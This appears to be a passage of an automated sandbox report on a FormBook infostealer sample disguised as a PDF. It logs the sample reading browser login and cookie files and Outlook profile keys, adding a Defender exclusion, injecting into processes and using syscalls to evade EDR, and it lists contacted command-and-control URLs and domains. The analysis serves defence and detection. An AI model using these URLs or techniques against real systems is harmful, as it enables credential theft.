                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeQueries volume information: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 15.2.NEW.RFQ00876.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.NEW.RFQ00876.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001A.00000002.3732187753.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.3732135762.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.3733834808.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1464634717.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1467457983.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.3718055960.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.3732033818.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\msinfo32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\msinfo32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 15.2.NEW.RFQ00876.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.NEW.RFQ00876.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000001A.00000002.3732187753.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.3732135762.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001B.00000002.3733834808.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1464634717.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.1467457983.0000000002570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.3718055960.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.3732033818.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		221
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Scheduled Task/Job                		11
                Disable or Modify Tools                		1
                Input Capture                		2
                Process Discovery                		Remote Desktop Protocol1
                Input Capture                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Abuse Elevation Control Mechanism                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Archive Collected Data                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object Model1
                Data from Local System                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571204 Sample: NEW.RFQ00876.pdf.exe Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 59 www.zoiheat.xyz 2->59 61 www.learniit.info 2->61 63 18 other IPs or domains 2->63 75 Suricata IDS alerts for network traffic 2->75 77 Sigma detected: Scheduled temp file as task from temp location 2->77 79 Multi AV Scanner detection for submitted file 2->79 83 8 other signatures 2->83 10 NEW.RFQ00876.pdf.exe 7 2->10         started        14 RAangyFeHdZLco.exe 5 2->14         started        signatures3 81 Performs DNS queries to domains with low reputation 59->81 process4 file5 51 C:\Users\user\AppData\...\RAangyFeHdZLco.exe, PE32 10->51 dropped 53 C:\...\RAangyFeHdZLco.exe:Zone.Identifier, ASCII 10->53 dropped 55 C:\Users\user\AppData\Local\...\tmpEC94.tmp, XML 10->55 dropped 57 C:\Users\user\...57EW.RFQ00876.pdf.exe.log, ASCII 10->57 dropped 93 Uses schtasks.exe or at.exe to add and modify task schedules 10->93 95 Adds a directory exclusion to Windows Defender 10->95 97 Injects a PE file into a foreign processes 10->97 16 NEW.RFQ00876.pdf.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        99 Multi AV Scanner detection for dropped file 14->99 101 Machine Learning detection for dropped file 14->101 25 schtasks.exe 1 14->25         started        27 RAangyFeHdZLco.exe 14->27         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 16->71 29 aegBDZrMeWOlT.exe 16->29 injected 73 Loading BitLocker PowerShell Module 19->73 32 WmiPrvSE.exe 19->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 23->38         started        40 conhost.exe 25->40         started        process9 signatures10 103 Found direct / indirect Syscall (likely to bypass EDR) 29->103 42 msinfo32.exe 29->42         started        process11 signatures12 85 Tries to steal Mail credentials (via file / registry access) 42->85 87 Tries to harvest and steal browser information (history, passwords, etc) 42->87 89 Modifies the context of a thread in another process (thread injection) 42->89 91 3 other signatures 42->91 45 aegBDZrMeWOlT.exe 42->45 injected 49 firefox.exe 42->49         started        process13 dnsIp14 65 www.learniit.info 203.161.42.73, 49962, 49968, 49974 VNPT-AS-VNVNPTCorpVN Malaysia 45->65 67 smartcongress.net 146.88.233.115, 50002, 50003, 50004 PLANETHOSTER-8CA France 45->67 69 11 other IPs or domains 45->69 105 Found direct / indirect Syscall (likely to bypass EDR) 45->105 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                NEW.RFQ00876.pdf.exe50%ReversingLabsByteCode-MSIL.Infostealer.Pony
                NEW.RFQ00876.pdf.exe49%VirustotalBrowse
                NEW.RFQ00876.pdf.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe50%ReversingLabsByteCode-MSIL.Infostealer.Pony

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                www.bankseedz.info1%VirustotalBrowse
                carsten.studio1%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.bankseedz.info/an5q/?PHM8hj-=ht9kvQ/be1JP/b8F6dsuUaMB3kIjPw/jKA2fsfIfXx0uGnoFDxCnsR3TxOuY1Ct1ICtwCZ7n9C9rVjVINs3eX7araPangYQRXR4uJHW7jN2yh/2XdhodgIRd1WkPDwc0LSaAOvXgTCEN&tHfx=9byl0%Avira URL Cloudsafe
                http://www.dietcoffee.online/ugyg/?tHfx=9byl&PHM8hj-=oCZiSXk+P+GRfK1CTz9r2QoANXD5JZtnUXBBKsmFkR5XdaXHzOV8eQzOlgaiqn8Qx6Xg8OpRPwSVnkrV8FGOE/7M7rIWJSwROyp8WcVtqR88cxmX/+Bsohxbo7MCCLhiJklW/Y5ke4/80%Avira URL Cloudsafe
                http://www.learniit.info/n8su/0%Avira URL Cloudsafe
                http://www.krshop.shop/5p01/?PHM8hj-=gA6TElZrCKVvAudK23F9jNDYdfN6rlDKrsL6QppRHZfK3DYPsJvxm5gqg5Wra8oJ+dNxCku7PXatRX1MrBH30S65OjFWUkDmOoMpCFx3AEVSn7FxR5wufZcQu20w9g7Qi9GQUVJhypaN&tHfx=9byl0%Avira URL Cloudsafe
                http://www.mrpokrovskii.pro/7mvy/?tHfx=9byl&PHM8hj-=h6bUgYM5oQIom3SHXrnUV9+6DYsiZuc3BKiCH+SaZEqPzQm7dEGcQubAgG7/7Rf+j7zw0nSl+ctDVIcki0zjLR/A1TIEgAjCXsb9E8vzRRsKI3KJo+lQnIV0aLjvGHYK1ASSJWLRp1oA0%Avira URL Cloudsafe
                http://www.bankseedz.info/an5q/0%Avira URL Cloudsafe
                http://www.questmatch.pro/1yxc/0%Avira URL Cloudsafe
                https://www.mrpokrovskii.pro/7mvy/?tHfx=9byl&amp;PHM8hj-=h6bUgYM5oQIom3SHXrnUV90%Avira URL Cloudsafe
                http://www.carsten.studio/8mom/0%Avira URL Cloudsafe
                http://www.airrelax.shop/gvzg/0%Avira URL Cloudsafe
                http://www.kvsj.net/zu0o/0%Avira URL Cloudsafe
                https://www.mrpokrovskii.pro/7mvy/?tHfx=9byl&PHM8hj-=h6bUgYM5oQIom3SHXrnUV90%Avira URL Cloudsafe
                http://www.questmatch.pro/1yxc/?PHM8hj-=sNv20zOiDYMkOMIaI1pmdsmeUTcgC7U2G3KMZ1n3ZrvJqNyjokS5yfEka1CqXs0XgMjSEo6oJscLiFZx2eOkVujOahZ4zlc0tGcqNQ4Ewnbxtpizbi9lhn/PRfD4HtEYcHVJw6C2z+yJ&tHfx=9byl0%Avira URL Cloudsafe
                http://www.airrelax.shop/gvzg/?PHM8hj-=3ZtrxXVK8OpQj/Id+SsCZR/FL5/Fz5CPqtakmq6NsaDAWPHTfqsTRo2NSgZOgOtgjwZcpccTv84fMQQl56Kttpvgnc7345UpTfNvcW90g2TqWWaj2VNxmTxTXc1CDHCPjDNjR8Ywq9s3&tHfx=9byl0%Avira URL Cloudsafe
                http://www.rysanekbeton.cloud/k6bb/?tHfx=9byl&PHM8hj-=Z6Ib5suwfioT2MqXoPl7+8o1pTKj4Qq520tiYNnV3r2mKqn+I/1Rm9W7kmGP+w3QV4Zo4FZXiImSr7GjAT/7kY4RF4YTze4eHm0UBMvXCvyEnRCS3SYcyFprHgke6jUgzgZsbqAOrl5q0%Avira URL Cloudsafe
                http://www.zoiheat.xyz/ti6k/?PHM8hj-=aooN9XnxZY5vLLqgNnNPDa+Wz6ZYVA+W9S/CD7OrytslWQsmx2XgKXMgpigq5ofFs8zPBHqDWa6akLIztBxoZf4FTaZeBdqZz3vksMYpoRC+eIBKeBja80AWwPS+rTgBCnnhKClLlEID&tHfx=9byl0%Avira URL Cloudsafe
                http://www.vayui.top0%Avira URL Cloudsafe
                https://gamesfunny.top$0%Avira URL Cloudsafe
